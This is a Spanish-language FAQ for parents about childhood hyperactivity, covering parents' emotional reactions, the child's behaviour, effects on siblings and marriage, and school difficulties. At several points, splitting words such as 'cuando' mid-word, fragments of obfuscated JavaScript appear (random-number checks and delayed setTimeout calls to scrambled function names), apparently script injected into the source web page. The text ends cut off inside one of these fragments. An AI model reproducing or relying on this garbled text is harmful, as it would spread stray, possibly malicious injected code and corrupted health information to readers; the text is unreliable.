LAS PREGUNTAS MÁS FRECUENTES SOBRE LA HIPERACTIVIDAD

Autoras: María Jesús Lázaro Ruiz y Rosa Alcántara Durán

          En la familia donde existe un hijo con algún tipo de dificultad se produce un gran impacto sobre los padres. Estos suelen presentar una serie de reacciones emocionales que se manifiestan a través del dolor, decepción, duda, coraje, culpabilidad, vergüenza, angustia y temor; surgiendo en ellos, además, un desequilibrio emocional, social y económico que, unido al desconocimiento sobre el problema, lleva a una atención inadecuada al niño y a su rehabilitación.

          Ante la deficiencia de un hijo, los padres pasan por una serie de fases como son:

-          Negación: están esperanzados porque creen que el diagnóstico es incorrecto.

-          Agresión: los padres pueden culparse mutuamente e incluso es posible que, avergonzados, rechacen al hijo; aunque por lo general están enfadados con el médico y con la vida.

-          Negociación: el déficit aún no es aceptado completamente, pero los padres se muestran dispuestos a dialogar y a negociar con el médico.

-          Depresión: cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando los padres reflexionan sobre la situación de su hijo, aparecerá en ellos el agotamiento, la falta de apetito, el insomnio y, en general, diferentes tipos de manifestaciones que dan lugar  a la depresión.

-          Aceptación: finalmente pueden aceptar de manera parcial o total el déficit de su hijo, aunque eso no garantiza que alguna de las fases anteriores vuelva a aparecer en ellos.

          Comentadas las fases por las que suelen pasar los padres ante un hijo con discapacidad, con este artículo en concreto, destinado a la  hiperactividad, pretenderemos dar respuestas a las muchas preguntas que se plantean los padres en torno a la misma para poder entender qué dificultad tienen sus hijos.


          Las preguntas más frecuentes que hallamos al respecto son:

 

¿Qué es la hiperactividad infantil?

          La hiperactividad infantil es un trastorno de conducta que se descubrió hace 148 años, más frecuente en niños que en niñas, que principalmente suele afectar a la atención y no a la actividad motora. En el caso de que existiese un exceso de actividad motora, ésta podría desaparecer con el tiempo, mientras que el déficit de atención no.


 ¿Por qué el niño hiperactivo parece que no escucha cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando le hablas y hay que repetirle mil veces las cosas para que responda?

          El niño hiperactivo suele distraerse fácilmente pareciendo que no escucha por su dificultad para mantener la atención durante ciertos períodos de tiempo y por eso le cuenta mucho seguir las indicaciones.


 ¿Cómo es el comportamiento de un niño hiperactivo?

          El comportamiento del niño hiperactivo es imprevisible, inmaduro e incluso inapropiado para su edad. A veces puede considerarse que los niños con esta discapacidad son malos, pero esa es una idea equivocada, en realidad simplemente son traviesos porque actúan sin pensar. Pueden darse casos en los que algunos niños con hiperactividad mientan con frecuencia, dándose importancia para ganarse la aprobación de compañeros, familiares, profesores… y otros en los que se irritan con facilidad pudiendo llegar a ser agresivos. Esta agresividad es verbal (amenazas e insultos) y física (destrozan sus cosas y las ajenas, metiéndose frecuentemente en peleas).

 ¿Es el entorno familiar el causante de la hiperactividad?, ¿por qué los padres se culpan de no saber educar a su hijo?

          La hiperactividad es consecuencia, en algunas ocasiones, de un ambiente familiar caótico y desestructurado. Sin embargo, esto no es lo habitual. Los padres suelen considerar la conducta hiperactiva de su hijo como un rechazo a su forma de actuar y esto les lleva a culparse de ineficaces. Estos niños suelen tener cierta habilidad para hacer perder el control de los que conviven con él, produciéndose en sus familiares sentimientos hostiles hacia el niño.


 ¿La discordia marital es la consecuencia de la hiperactividad en el pequeño?

          La discordia marital suele ser una consecuencia de la conducta hiperactiva en el niño. En este caso, los padres deben poner conjuntamente los medios necesarios para corregir la problemática de su hijo.


 ¿Tienen las madres de niños con hiperactividad un mayor riesgo de padecer depresiones?

           Las madres de estos niños reciben un “feedback” negativo de su marido y quizás de otros familiares o profesores, produciéndose en ellas un alto nivel de ansiedad, piensan que sus hijos son un fracaso y que ellas no están preparadas para afrontar esta situación. Por ello puede desencadenarse en ellas una depresión que les lleve a beber o a tomar tranquilizantes para poder seguir adelante.


 ¿Cómo influye  la hiperactividad en los hermanos?

          Si quien posee la hiperactividad es el hermano menor y el mayor es  muy responsable, tiene riesgo de sufrir trastornos depresivos. En cuanto a los hermanos menores del niño hiperactivo, generan un concepto de sí mismos bajo, un estado emocional depresivo y ansioso y ciertos sentimientos de ineficacia.


 ¿Cuál es la conducta más conflictiva en el colegio y cómo se relaciona con sus compañeros?

          La conducta más conflictiva es la falta de disciplina. Estos niños no suelen responder con la misma facilidad y prontitud que los compañeros a lo que le pide el profesor; hacen lo contrario o simplemente, no lo hacen. En lo que respecta a la relación con el resto de los escolares pueden ejercer de líderes o bien ser rechazos por sus compañeros.


 ¿Qué piensa el profesor y cuáles son las quejas más frecuentes que les transmiten a los padres?

          Los profesores suelen calificar a estos niños como inmaduros, cabezotas, holgazanes y desobedientes, que no han sido educados correctamente en sus casas y por eso se quejan porque no permanecen en sus pupitres, porque molestan a sus compañeros y no permiten que se concentren para realizar las tareas que se proponen en la clase. En algunas ocasiones,  los profesores proponen a los padres que sus hijos repitan para que adquieran la madurez que les falta.


 ¿Qué dificultades tienen en el aprendizaje y por qué sacan “malas notas”?

          Las dificultades en el aprendizaje se basan fundamentalmente en la adquisición y manejo de la lectura, en la escritura, en el cálculo, en la memorización y en la generalización de la información adquirida. Referente, a las malas notas, estas se deben a la distracción, a la no capacitación de mantener la atención durante breves períodos de tiempo, a la no aceptación de fracasar y cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando una tarea les supone mayor esfuerzo, la abandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}